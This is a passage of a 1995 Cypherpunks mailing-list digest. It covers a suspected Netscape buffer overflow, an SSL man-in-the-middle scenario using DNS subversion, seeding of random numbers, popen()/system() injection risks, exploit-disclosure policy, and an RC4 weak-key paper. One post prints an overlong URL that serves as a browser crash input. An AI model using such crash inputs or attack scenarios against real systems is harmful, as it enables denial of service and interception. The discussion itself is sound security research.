TLAs, and seems to be up to his elbows in the Current Fantasy according to the Powers that Be, in particular, its legal armature: legal sanction, non-repudiation, True Names, and all. Which leads me to *his* moniker. I thought I was going to be civil about this, and just refer to him in the third person singular, but I had this amazing brainstorm. Remember the comedian "Professor" Edwin Corey, who died recently? His schtick was a variant on the nutty professor, obfiscatory language, lab coat, Converse high-tops and all, and he called himself the "The World's Foremost Authority". Didn't say on what, which was the point. As a philosophy major at Mizzou who really loved his informal fallacies, one of which was the Appeal to Authority, this particular example always made me laugh. So, I've dubbed this particular informant "Edwin Corey", or "Mr. Corey" in true Oxfordian fashion, not to be at all uncharitable, but because, in truth, this guy is probably the world's foremost authority on this stuff, if anyone is... He's going to give me pointers to some of this proposed "legal armature" from time to time, the first of which is a report by one Michael Baum entitled, deep breath, "Federal Certification Authority Liability and Policy: Law and Policy of Certificate-Based Public Key and Digital Signatures". This 500+ page monster can be obtained from, who else, The Feds, in particular, another big breath, the United States Department of Commerce, Technology Administration, National Technical Information Service, Springfield, VA, 22161; (703) 487-4650. The cost is $61, plus $6 for shipping and handling, plus $2 for orders sent outside the U.S., Canada or Mexico, plus rush charges if you call 1-800-553-NTIS, and if you *don't* jump up and down three times *before* you write the check or read them your credit card over the phone, the trade will be repudiated. ;-). Oh. It says something here about being able to get it through a web-site called FedWorld, http://www.fedworld.gov . So, it's very important to work on financial objects and agents. However, I should really try to concentrate on the issue of non-repudiation, because it is a necessary, and maybe (strong form) necessary and sufficient, criteria for the development of digital commerce on public networks. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ddt at lsd.com Fri Sep 22 06:27:36 1995 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 22 Sep 95 06:27:36 PDT Subject: Cypherpunks Press release Message-ID: At 9:09 am 9/20/95, David J. Bianco wrote: >On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail >archives: >> Subject: Cypherpunks Press release >|| -----BEGIN PGP SIGNED MESSAGE----- >|| >|| We've seen the word "hacker" kicked around rather arbitrarily in the >press. >|| Are we to conclude that the cypherpunks are a bunch of hackers? I think >its >|| time for some cypherpunks spin. How about a logo *and* a press release? >The >|| press release would give contacts (email, phone, etc.) so that someone >on >|| this list would be contacted by journalists when a crypto story breaks. >|| >|| If we get enough volunteers, we can fax blanket every newspaper, >station, >|| and network in the world. >|| > >I think it's a great idea, personally. I think many journalists would like >to find third party opinions about network security and other cryptography >issues, but just don't know who to talk to about them. By making it easy >for them to find us, we'd be more likely to be consulted for opinions. [elided] I think a media contact group is a good idea too, but I think we should handle it by having a special address that media people can send to to request information and that it should split the incoming mail and route it to a group of volunteers who could then respond. Question from media people are usually NOT going to be heavily tech-oriented, and this sort of press list would give the lesser cryptologists among us, who nevertheless have a significant amount of knowledge about public policy issues concerning crypto, a chance to be useful. BTW, is still operating, and the small group of knowledgeable cypherpunks there all see the mail that comes in and cc the list when someone asks a PGP question and gets it answered by one or more of the volunteers. This would be a good model to expand on, imho. Everyone learns something, people go away impressed by the quality answers, etc. :) dave From herbs at interlog.com Fri Sep 22 06:41:58 1995 From: herbs at interlog.com (Herb Sutter) Date: Fri, 22 Sep 95 06:41:58 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221341.JAA07664@gold.interlog.com> At 07:33 1995.09.22 GMT, Jeff Weinstein wrote: >In article <199509220612.CAA11441 at clark.net>, rjc at clark.net (Ray Cromwell) writes: >> I've found a Netscape bug which I suspect is a buffer overflow and >> may have the potential for serious damage. If it is an overflow bug, >> then it may be possible to infect every computer which accesses a web >> page with Netscape. To see the bug, create an html file containing >> the following: > > Thanks for the report. I will make sure that this is fixed. > > --Jeff Don't just look at this bug, though... check ALL your static buffers and include code to check for overflow writes. For example, if Netscape is written in C or C++ and the above code uses strcpy(), you could change strcpy() to strncpy() everywhere (and then set the last char to null in case strncpy() didn't). Your programmers will know what I mean. Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From fletch at ain.bls.com Fri Sep 22 07:06:55 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Fri, 22 Sep 95 07:06:55 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com> Message-ID: <9509221401.AA26983@outland> I've been lurking for a week or two, but I wanted to say something about this: > I think it probably has more to do with the fact that the name > "Netscape" has been on the front page of every major newspaper in the > US. I guess bad press is better than no press at all. And the press > hasn't even been that bad. And you have to take into account that a good chunk of the population has no clue about how either encryption (well, basic math for a good chunk :/ ) or software works. Just heard something on the radio (Niel Bortz, if you're curious) about how California public schools have started giving credit for wrong answers on MATH tests. So the students don't _feel bad_ about being wrong. I want to trust my life to an airplane designed by someone who got the right answers, not to someone who has artificially induced high self-esteem. The casual Joe Sixpack at most may now that if Microsloth Doesn'tWorks has a problem he goes out 9 months later and shells out more $$$ for the next buggy release. Start mentioning 128-bit IDEA, entropy, or pseudo-anything and their eyes may just glaze over. With the state of public education, it'll be amazing if Joe Sixpack can figure out that he has to plug in his computer first; nevermind understand why trusting his financial secrets to a secret "proprietary" encryption scheme that the gubument has the back door to is a bad idea. Sorry, I'll end my ranting now. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From bianco at itribe.net Fri Sep 22 07:10:59 1995 From: bianco at itribe.net (David J. Bianco) Date: Fri, 22 Sep 95 07:10:59 PDT Subject: SSL Man-in-the-middle Message-ID: <199509221407.KAA23176@gatekeeper.itribe.net> Has anyone given much thought to the feasability of a man-in-the-middle attack against an SSL (or other similar) transaction? To me, the possibility seems obvious, so I figure it must have been discussed before, though I haven't seen it. The basic idea is pretty simple, really a flaw in the user interface of the browser more than a flaw in SSL. Neither browsers nor servers routinely validate that they are communicating with the entity they think they are. Sure, with netscape you can ask for the document information window, which shows the server's public key information, but this isn't a common action among users, and certainly isn't something you'd want to do for every page you viewed. The only readily accessible information about security is that blue key at the bottom of the netscape window. Netscape docs tell you that if that key is blue, your transaction is "secure." In reality, the only thing that key means is that you've negotiated a session key and are encrypting your communications. It says nothing about the fact that you're actually communicating with the correct party. Authentication is a large part of security, and Netscape doesn't make that information conveniently available. Consider the following example. Bob wants to communicate securely with Alice. He fires up his "secure" browser, looks up Alice's address in the DNS and makes a connection. He then sends Alice a document and disconnects. Now consider the following attack on the scenario: Bob still wants to communicate with Alice. He fires up his browser and looks up Alice in the DNS. Mallet, who wants the information Bob's sending, has subverted Alice's DNS server and replaced Alice's IP address with his own, making a note of the proper value. Thus, when Bob looks up Alice's address in DNS, he gets the wrong information and contacts Mallet instead. Mallet performs the SSL protocol with Bob, pretending to be the server, and then with Alice, pretending to be the client. Since neither the browser nor the server perform any authentication checks, neither Bob nor Alice know they are really speaking to Mallet. The best Alice can do is check the IP address of the client she's speaking to, but if Mallet has his own DNS, he can make the IP address map to whatever name he wants, including Bob, in order to fool alice. Even if Alice doesn't depend on the DNS for IP resolution, probably doesn't know that the IP address in question is really Mallet's, since it looks just like any other IP address to her. In this scenario, Bob gets a warm fuzzy since his key is blue and he knows his information is being encrypted as it goes out. Alice has a smaller fuzzy, since she believes the transaction is secure from prying eyes. Mallet has a *really big* fuzzy, since he's able to read the data Bob sends, decrypt it, save it, then re-send it to Alice. I've read through the SSL spec, and it provides authentication for both the server and the client, but these features are rarely used, probably because they are somewhat inconvenient for the user. A good first step would be to include the IP address of the server in the certificate signed by VeriSign. In this way, browsers could perform automatic checks that the IP address in the certificate is actually the one that's being communicated with. This does raise other questions (such as protecting from IP spoofing), but IMHO would be a good way of providing an automatic "first check" without inconveniencing users. The added inconvenience of obtaining a new certificate when your server's IP address changes is fairly minor, and could be viewed as necessary overhead for doing secure transactions via the Net. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From m1smf99 at FRB.GOV Fri Sep 22 07:13:45 1995 From: m1smf99 at FRB.GOV (Scott M Fabbri) Date: Fri, 22 Sep 95 07:13:45 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com> Message-ID: <9509221411.AA00721@arcss5.FRB.GOV> > I don't believe the Sun Java stuff would suffer from it, although I > fear Java a great deal. Java's doesn't break on this one. All you get back is a message saying the domain isn't defined. BTW: This was tested using http://foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/ on a SunOS box using HotJava 1.0 alpha 3. Scott -- Scott Fabbri sfabbri at frb.gov Opinions solely my own -- who else would want them? From trei at process.com Fri Sep 22 07:25:19 1995 From: trei at process.com (Peter Trei) Date: Fri, 22 Sep 95 07:25:19 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <9509221425.AA15952@toad.com> > Received: from relay3.UU.NET [192.48.96.8] by alcor.process.com > with SMTP-OpenVMS via TCP/IP; Fri, 22 Sep 1995 03:36 -0400 > Received: from toad.com by relay3.UU.NET with SMTP > id QQzigj22616; Fri, 22 Sep 1995 03:27:16 -0400 > Received: by toad.com id AA02740; Fri, 22 Sep 95 00:24:28 PDT > Received: from quilla.tezcat.com by toad.com id AA02734; Fri, 22 Sep 95 00:24:24 PDT > Received: from [206.1.161.4] (clubred.redweb.com [206.1.161.4]) by quilla.tezcat.com (8.6.12/8.6.12) with SMTP id CAA23469 for ; Fri, 22 Sep 1995 02:24:21 -0500 > X-Sender: goedel at 204.128.247.5 > Message-Id: > Mime-Version: 1.0 > Content-Type: text/plain; charset="us-ascii" > Date: Fri, 22 Sep 1995 02:25:21 -0600 > To: cypherpunks at toad.com (Cypherpunks Mailing List) > From: goedel at tezcat.com (Dietrich J. Kappe) > Subject: Re: Another Netscape Bug (and possible security hole) > Sender: owner-cypherpunks at toad.com > Precedence: bulk > > -----BEGIN PGP SIGNED MESSAGE----- > > >Ray Cromwell writes: > >> I've found a Netscape bug which I suspect is a buffer overflow and > >> may have the potential for serious damage. If it is an overflow bug, > >> then it may be possible to infect every computer which accesses a web > >> page with Netscape. To see the bug, create an html file containing > >> the following: > > > >Oh brother, this is unbelievable ! > > > >I'm using Netscape 1.1N under SunOS 4.1.2. I can crash Netscape 1.1N under NT by entering a URL with a very long domain name in the 'Location:' window. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From bianco at itribe.net Fri Sep 22 07:37:04 1995 From: bianco at itribe.net (David J. Bianco) Date: Fri, 22 Sep 95 07:37:04 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: <199509221430.KAA23225@gatekeeper.itribe.net> On Sep 22, 6:26, Dave Del Torto sent the following to the NSA's mail archives: > Subject: Re: Cypherpunks Press release || I think a media contact group is a good idea too, but I think we should || handle it by having a special address that || media people can send to to request information and that it should split || the incoming mail and route it to a group of volunteers who could then || respond. Question from media people are usually NOT going to be heavily || tech-oriented, and this sort of press list would give the lesser || cryptologists among us, who nevertheless have a significant amount of || knowledge about public policy issues concerning crypto, a chance to be || useful. || I like this idea, too, except that it presupposes that the journalists who want to contact cypherpunks have access to email. Although that's a common thing, it's not uniformly available yet. Still, it's a useful service for those journalists who do have access to email. Perhaps both could be done, with the people on the mailing list also available via conventional means for the less techno-savvy journalists. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From sameer at c2.org Fri Sep 22 07:39:36 1995 From: sameer at c2.org (sameer) Date: Fri, 22 Sep 95 07:39:36 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com> Message-ID: <199509221434.HAA28036@infinity.c2.org> > > The problem is that if you don't produce a (benign) exploit people > aren't going to take it seriously enough. > And without an exploit you won't get a t-shirt. (In general, an exploit is required for a t-shirt to be made & awarded. Exceptions may be granted, however, depending upon the situation.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From frissell at panix.com Fri Sep 22 08:09:16 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 22 Sep 95 08:09:16 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) Message-ID: <199509221509.LAA09991@panix.com> >The proposal would make telecoms operators responsible for decrypting >traffic and supplying it to governments when asked. It would also >`change national laws to enable judicial authorities to chase hackers >across borders'. > >However, `it remains possible that cryptography is available >to the public which cannot be deciphered,' his document says. `This >might lead to the conclusion to put restrictions on the possession, >distribution, or use of cryptography.' This should prove about as effective as the current French or Russian bans. What are they going to do when they figure out that there need no longer be such a thing as a telecoms operator. We do most of the message packaging ourselves. It will be a bit difficult for any connectivity supplier to tell what's going out via one of our encrypted IP sessions. Question for Perry -- I'm assuming that it will soon be possible to originate encrypted TCP/IP sessions with a distant "process" somewhere. Do you see technical problems with a TCP/IP laundry being established "somewhere" that strips trace info from one of my processes and prevents back tracing beyond the mouth of this encrypted pipe? Also Perry, what did you think of the article "How Anarchy Works" in the latest Wired on the IETF? DCF From lethin at ai.mit.edu Fri Sep 22 08:15:08 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Fri, 22 Sep 95 08:15:08 PDT Subject: No Subject Message-ID: <199509221511.LAA09778@grape-nuts.ai.mit.edu> I just received the following email message: I just concluded a small number of trades whereby I purchased cb$ with US$ at the rate of US$8 per cb$100. An obvious concern with ticker tapes is the loss of privacy. The truly paranoid should avoid even posting exchange rates, but even regular folks might want to avoid the details of each of their transactions. I still think a ticker tape to ecm with concluded transactions and bids taking place on the electronic cash market web pages is useful. I don't want to spend time polling various exchanges. The ticker tape could also be used to do arbitrage between exchanges. The names of the participants can be omitted to protect anonymity of traders. Besides, if the traders really want to protect anonymity they'll be working through remailers or TCP tunnels. The exchange SHOULD be listed on the ticker tape, so that people wanting to trade can find the spot where they can make the trade. This then serves as an advertising means for the exchanges which are offering the best prices and volume, etc. In any transaction one of the two parties will have wished they'd known the market price, if the price of the transaction is not at the market price. This ignores the value of the reputation of the parties involved, etc. So I propose that transactions and offers be sent to ecm in the following form: E= US= BUY-OFFER|SELL-OFFER|CONCLUDED DATE TIME serial# EUID= which is more or less the original syntax for ecm, substituting the exhange UID for the email address of the person making the offer. As usual the syntax is optional, so you should feel free to append other information as you'd like (expiration date, method of concluding transaction, etc.) --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 (To subscribe to ecm, send email to ecm-request at ai.mit.edu with the word subscribe in the body. A digest version is available at ecm-digest-request.) From patrick at Verity.COM Fri Sep 22 08:15:47 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:15:47 PDT Subject: Exchange random numbers (was: Re: netscape's response) Message-ID: <9509221511.AA19305@cantina.verity.com> > > This isn't a problem as I see it, he'll only know what bits he > flipped, not the actual state. Wouldn't even know that if you permuted it. You _could_ use a fixed permutation, or you could use input information from another source to select the permutation. Even something as simple as taking 5 bits from one source and using another source mod(random seed length) to decide where to xor it into the random seed. (Rotating back to the front if needed, or you could let the bits fall off the end.) And if all you ever give out to randomness partners is the result of a good hash there's no way they could ever determine anything from it, or determine what effect their contribution had. Shoot, they wouldn't know if their contribution went into the seed, or merely affected how someone elses contribution went into the seed. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From pdlamb at iquest.com Fri Sep 22 08:15:53 1995 From: pdlamb at iquest.com (Patrick Lamb) Date: Fri, 22 Sep 95 08:15:53 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221515.KAA01511@vespucci.iquest.com> HotJAVA apparently doesn't suffer from this bug, at least the 1.03 Alpha NT version. On the other hand, HotJava does truncate the URL to fit in its window. (I suppose I could try a very large screen with a very small font, just to make sure -- anyone willing to donate a 19" screen or bigger?) Pat -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzACleQAAAEH/2+41W3bZPuWU1gv6A0bq3a57bgCiCAbU1QY41f+NI1I8i/+ a/L314RIpCR0iCZhsNMHNI9rVovsbmOQE4Cf9YYL3cClUoE2VAsLOi9LAjlN8qYc kmAqpsGQ39eaKrnlC/0lxJtFZgypT4m9UIsTU986y3gyy+ZTWwxtbDaLBEdsTiH/ e+zosoBiXmwWYY1n+5yvaKLGMUwa20AKdoRCUgqhJQpkW0nAvItU6WhaqxwH6JXp KCNsuP6k8FBmcKZfSSvUphSOIJnARAq9K9UPhj5BeAy1vKZ416jfgeYQUTxHQOMT rTiQOYR/oAR35gBpGYg6p1lu6Ma5eDPtpBPadUUABRG0IFBhdHJpY2sgTGFtYiA8 cGRsYW1iQGlxdWVzdC5jb20+ =DZzp -----END PGP PUBLIC KEY BLOCK----- From patrick at Verity.COM Fri Sep 22 08:23:07 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:23:07 PDT Subject: Seeds which depend on machine states Message-ID: <9509221519.AA19310@cantina.verity.com> > > Miguel Diaz writes: > > It is my suspicion that seeds which depend on machine > > states(ie state of your computer at a specific instance of > > time) would always be subject to scrutiny and de-cryption. > > As long as the software used to encrypt is not self-modifying, > > the machine state can (through careful manipulation involving > > temperature, clocks, processes etc)always be replicated and > > fixed to an acceptable degree. > > Try getting a human to type with the same timing, to microsecond > precision, the same way twice. > That assumes that you have someway of measuring the timing to microsecond precision. On most machines I've been on, if you get something time- stamped, even if there is a microsecond portion of the timestamp it's meaningless because it wasn't based on a timer with the required precision. If a timer can only resolve milliseconds, the microseconds don't have any meaning. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From patrick at Verity.COM Fri Sep 22 08:35:52 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:35:52 PDT Subject: "random" number seeds vs. Netscape Message-ID: <9509221532.AA19315@cantina.verity.com> > > Nor is there anything inherently wrong with having sex without the use > of a condom. YES! Safe exec! Use software protection;) (Can you tell that when I read this I was LOL!?) > > However, it is very difficult -- VERY DIFFICULT -- to prove to > yourself that there is never an instance in which your system() or > popen() can be abused. Well...you can tell by looking, certainly that's not true when you need a condem;) > In any case, I find its often more prudent just > to strip all these things out of my code. If you don't use them, you > don't have to prove they are done properly. Paranoia is your > friend. No one can ever break you for doing something you don't do. That's true, I have to admit that I usually don't use them either. Once you know how they're coded up, and how little code is actually used, it seems silly anyway to call a popen or system and suffer the overhead of the function calls and the loss of control. > > > The problem arises when you use information given to you from > > outside as the argument to popen or system without checking it. > > Yup, but often, you'd be suprised what turns out to be outside data. You're singing to the choir. Sigh, Eric Allman's been several times surprised about what turned out to be outside data. > > In any case, you obviously also understand why this is bad, but I hope > that people out there understan -- always make sure that you are > double extra careful about the use of such calls. Thanks:) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From dhenson at itsnet.com Fri Sep 22 08:42:57 1995 From: dhenson at itsnet.com (Don Henson) Date: Fri, 22 Sep 95 08:42:57 PDT Subject: Munition (RSA/Perl) T-shirts Now Shipping From Stock! Message-ID: <199509221557.JAA23019@scratchy.itsnet.com> By now, everyone knows about the TSHIRT that has been classified as a MUNITION by the US Goverment. If you don't know, just send email to wepinsto at colossus.net with a subject of 'TSHIRT STORY' and you will receive full details via return email. We have thus far shipped over 850 of the RSA/Perl Munition T-shirts and are now in a position to ship most orders from stock. You no longer have to pay your money and wait for months to get your t-shirt while someone else collects interest on YOUR money. We (WEPIN Store) can ship your t-shirt within two weeks of receiving your order. Orders are still pouring in. Don't be left out. Order your's today. (Read some comments of our customers at the end of this post.) For more information on how to own this classic example of civil disobedience, just send email to wepinsto at colossus.net with the subject of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the info.) Or, if you have WWW access, just point your Web browser to: http://colossus.net/wepinsto/wshome.html By the way, 25% of the profits from the sale of the tshirt (in the US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help defend the author of PGP from harassment and possible prosecution by the Fedgoons. And if you get arrested for wearing the Munitions Tshirt, we'll refund your purchase price. :-) ====++++====++++ Here are some testimonials from a few of our many satisfied customers: "Got mine this afternoon. Wooohhaah!! Already had some folks at Blockbusters point, mumble to themselves, and then ask me what the munitions warning meant. This is going to be fun!! I'm a cyphernerd for sure..." "Thanks for the great T-shirt. I'm making copies of your paper order form for others." "I think I'll have to wear the shirt over to Logan Airport and hang around the International Arrivals terminal a few times. " "I received the T-shirt on 8/3. Thank you, it has been a pleasure dealing with you!" "The first thing that I did after it arrived was to don it and then go visit the office of one of our visiting researchers from Russia. :)~" ====++++====++++ Get your Munitions Tshirt now. Who knows how long they'll stay in production! Don Henson, Managing Director (PGP Key ID = 0X03002DC9) West El Paso Information Network (WEPIN) email: wepinsto at colossus.net Check out The WEPIN Store at URL: http://colossus.net/wepinsto/wshome.html From michaelh at Informatik.Uni-Bremen.DE Fri Sep 22 08:53:02 1995 From: michaelh at Informatik.Uni-Bremen.DE (Michael Hortmann) Date: Fri, 22 Sep 95 08:53:02 PDT Subject: new source of PGP sourcecode Message-ID: <199509221554.RAA22108@bettina.informatik.uni-Bremen.de> Michael Hortmann Dept. of Mathematics University of Bremen michaelh at informatik.uni-Bremen.de PGP public key by finger ____________ Reconstructing PGP 2.6.1 Sourcecode by Scanning and OCR'ing the MIT-Press Book It has always been somewhat awkward to produce legal versions of PGP outside the US, requiring a lot of extra work. Recently, MIT-Press published the book Philip Zimmermann PGP Source Code and Internals which can be purchased in any bookstore. In the foreword it is mentioned that this book may not be exportable, because it has not been granted a "Commodities Jurisdiction" (CJ) by the US State Department. However, the international book distributors don't seem to take notice of that. Presently, I'm trying to find out what the legal status of the book may be in Germany, if it would be legitimate to request me to destroy it, or if on the contrary I can legally extract its contents and publish the result on the Internet. In the meantime I have asked some of my students to scan the book. This has already been accomplished, resulting in about 150MB image files. Right now the OCR process is on its way; by looking at samples we are optimistic that most mistakes will be found and corrected by a semiautomatic editing process; what mistakes remain should be detected by the compiler. As we will keep the image files, the original OCR files, the awk-scripts and intermediate files of the editing process, there can be no doubt that the final sourcecode has resulted from the book, and not from an illegal ftp. Each file will be marked as of this origin. When I'm convinced of the legality of this course of action, I will give notice on the Net and deposit the final product and the intermediate files under appropriate names in ftp://ftp.uni-Bremen.de/pub/security/crypt/ For the Net-community it may be interesting to know now that such a project is on its way. _______ From patrick at Verity.COM Fri Sep 22 09:07:49 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 09:07:49 PDT Subject: Executing code on the stack, was Re: netscape bug Message-ID: <9509221604.AA19341@cantina.verity.com> > very big, and you can do what you like. The 8lgm people wrote a demo > for Sparc as a proof of concept. It's worth mentioning that 8lgm (Eight little green men;) has recently changed their policy on how long they wait to make exploit scripts available. It has resonance with what's happened here on cypherpunks lately. They used to publish that there was a hole, but would hold up quite a while on making the exploit scripts available. They were trying to make it safer for manufacturers and give them time to make fixes available first. What actually happened is that manufacturers would put the fixes on the backburner, and often not get around to them at all. 8lgm found that publishing the exploit scripts usually resulted in quick fixes from the vendors. Now the exploitation details are available quite quickly. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From patrick at Verity.COM Fri Sep 22 09:14:15 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 09:14:15 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <9509221610.AA19346@cantina.verity.com> > > [I hear Perry in the background groaning and muttering "I told you so"] > These buffer overflow bugs should be taught in every programming > 101 course along with fencepost errors. > > I'm not even sure if I want to write the obligatory program to exploit > the hack given that some malicious jerk would probably use it > on his home page to attack people. > You should consider that there are people with a lot of expertise that are constantly on the lookout for things like this. I would bet a nickel to a donut that many people in the cracker community discovered this a long time ago and that exploit code was written long ago. How many people logged in as root use netscape? If the source was available we'd have told them about this long ago. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From patrick at Verity.COM Fri Sep 22 09:30:49 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 09:30:49 PDT Subject: Reformatted Weak Keys in RC4 for readability. Message-ID: <9509221627.AA19355@cantina.verity.com> I modified only the formatting to get rid of the wrap...I did it so that I could enjoy reading it and I send it in to y'all so you won't have to do it as well...it's a wonderful paper. Patrick A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER PRELIMINARY DRAFT ANDREW ROOS VIRONIX SOFTWARE LABORATORIES 1. INTRODUCTION This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows that for at least 1 out of every 256 possible keys the initial byte of the pseudo-random stream generated by RC4 is strongly correlated with only a few bytes of the key, which effecitively reduces the work required to exhaustively search RC4 key spaces. 2. STATE TABLE INITIALIZATION IN RC4 Although the RC4 algorithm has not been published by RSA Data Security, source code to implement the algorithm was anonymously posted to the Cypherpunks mailing list several months ago. The success of the Cypherpunks' brute-force attack on SSL with a 40-bit key indicates that the source code published did accurately implement RC4. RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte state table which is used for the subsequent generation of pseudo-random bytes. The state table is first initialized to the sequence {0,1,2,...,255}. Then: 1 index1 = 0; 2 index2 = 0; 3 4 for(counter = 0; counter < 256; counter++) 5 { 6 index2 = (key_data_ptr[index1] + state[counter] + index2) % 256; 7 swap_byte(&state[counter], &state[index2]); 8 index1 = (index1 + 1) % key_data_len; 9 } Note that the only line which directly affects the state table is line 7, when two bytes in the table are exchanged. The first byte is indexed by "counter", which is incremented for each iteration of the loop. The second byte is indexed by "index2" which is a function of the key. Hence each element of the state table will be swapped at least once (although possibly with itself), when it is indexed by "counter". It may also be swapped zero, one or more times when it is indexed by "index2". If we assume for the moment that "index2" is a uniformly distributed pseudo-random number, then the probability that a particular single element of the state table will be indexed by "index2" at some time during the initialization routine is: P = 1 - (255/256) ^ 255 = 0.631 (The exponent is 255 because we can disregard the case when "index2" and "counter" both index the same element, since this will not affect its value.) Conversely, there is a 37% probability that a particular element will _not_ be indexed by "index2" during initialization, so its final value in the state table will only be affected by a single swap, when it is indexed by "counter". Since key bytes are used sequentially (starting again at the beginning when the key is exhausted), this implies: A. Given a key length of K bytes, and E < K, there is a 37% probability that element E of the state table depends only on elements 0..E (inclusive) of the key. (This is approximate since "index2" is unlikely to be uniformly distributed.) In order to make use of this, we need to determine the most likely values for elements of the state table. Since each element is swapped at least once (when it is indexed by "counter"), it is necessary to take into account the likely effect of this swap. Swapping is a nasty 